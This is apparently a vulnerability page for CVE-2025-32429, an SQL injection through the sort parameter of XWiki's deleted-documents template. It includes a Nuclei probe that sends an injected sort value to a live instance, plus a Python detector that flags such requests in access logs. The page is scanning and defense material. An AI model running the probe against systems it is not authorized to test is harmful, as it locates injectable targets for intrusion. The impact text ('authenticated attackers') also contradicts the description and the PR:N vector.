XWiki Platform - SQL Injection

CVE-2025-32429
Early Release

Description

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, anyone can inject SQL through the sort parameter of the getdeleteddocuments.vm template: its value is inserted as-is into an ORDER BY clause.

Severity

Critical

CVSS Score

9.8

Exploit Probability

16%

Affected Product

xwiki

Published Date

November 3, 2025

Template Author

ritikchaddha

CVE-2025-32429.yaml
id: CVE-2025-32429

info:
  name: XWiki Platform - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2, anyone can inject SQL through the sort parameter of the getdeleteddocuments.vm template: its value is inserted as-is into an ORDER BY clause.
  impact: |
    Authenticated attackers with access to the deleted documents trash feature could inject SQL code, leading to data leakage, database modification, or further compromise of the application.
  remediation: |
    Upgrade to XWiki Platform version 16.10.6 or 17.3.0-rc-1 (or newer), which address this vulnerability. Always validate and sanitize user-controlled input used in query parameters.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23093
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32429
    epss-score: 0.15873
    epss-percentile: 0.94458
    cwe-id: CWE-89
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,hqli,sqli,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected"

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Exception", "org.xwiki.livedata.LiveDataException", "HqlQueryScriptService")'
          - 'contains(content_script_type, "text/javascript")'
          - 'status_code == 500'
        condition: and
# digest: 490a00463044022039068c50d61db758cf19ad7718cb250498f3446333df503c986b33682fe39b81022039b2b03d1916edc1af16038bf89a0f263bd60bb1473f9837193402d60092730d:922c64590222798bb761d5b6d8e72950
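As an added detection example (not part of the Nuclei template above or of XWiki's own code), the following Python scans web-server access-log lines for requests that look like the template's probe: the liveTable endpoint with sourceParams.template=getdeleteddocuments.vm and a sort value that is not on an allowlist, or that ended in HTTP 500 as the template's matcher expects. The allowlist and the log lines are constructed assumptions, not values taken from XWiki.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and template named in the advisory and in the Nuclei template above.
ENDPOINT = "/xwiki/rest/liveData/sources/liveTable/entries"
TEMPLATE = "getdeleteddocuments.vm"
# Assumed allowlist of sort values the legitimate UI sends; replace it with
# the values your own deployment's deleted-documents live table emits.
EXPECTED_SORT = {"doc.fullName", "doc.date", "doc.author"}

# Combined log format: client IP, timestamp, request target and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (not real traffic): a normal listing, a probe that
# mirrors the template's request and its 500 response, and two unrelated hits.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Nov/2025:10:00:01 +0000] "GET /xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=doc.date HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Nov/2025:10:00:07 +0000] "GET /xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected HTTP/1.1" 500 812 "-" "curl/8.4.0"
10.0.0.9 - - [03/Nov/2025:10:00:09 +0000] "GET /xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdocuments.vm&sort=doc.date HTTP/1.1" 200 3100 "-" "curl/8.4.0"
10.0.0.7 - - [03/Nov/2025:10:01:00 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return ip, timestamp, path, parsed query and status, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "query": parse_qs(parts.query), "status": int(m.group("status"))}

def find_sort_probes(log_text, allowed=EXPECTED_SORT):
    """Flag getdeleteddocuments.vm liveTable requests with an off-allowlist sort or a 500."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != ENDPOINT:
            continue
        if rec["query"].get("sourceParams.template", [""])[0] != TEMPLATE:
            continue
        sort = rec["query"].get("sort", [""])[0]
        reasons = []
        if sort and sort not in allowed:
            reasons.append("sort value not on allowlist: " + sort)
        if rec["status"] == 500:
            reasons.append("HTTP 500 on the vulnerable endpoint")
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "sort": sort, "reasons": reasons})
    return findings
```

Requests for other templates and other paths are deliberately ignored, so the allowlist only has to describe what the deleted-documents live table itself sends.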
CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-32429
CWE ID: CWE-89

Remediation Steps

Upgrade to XWiki Platform version 16.10.6 or 17.3.0-rc-1 (or newer), which address this vulnerability. Always validate and sanitize user-controlled input used in query parameters.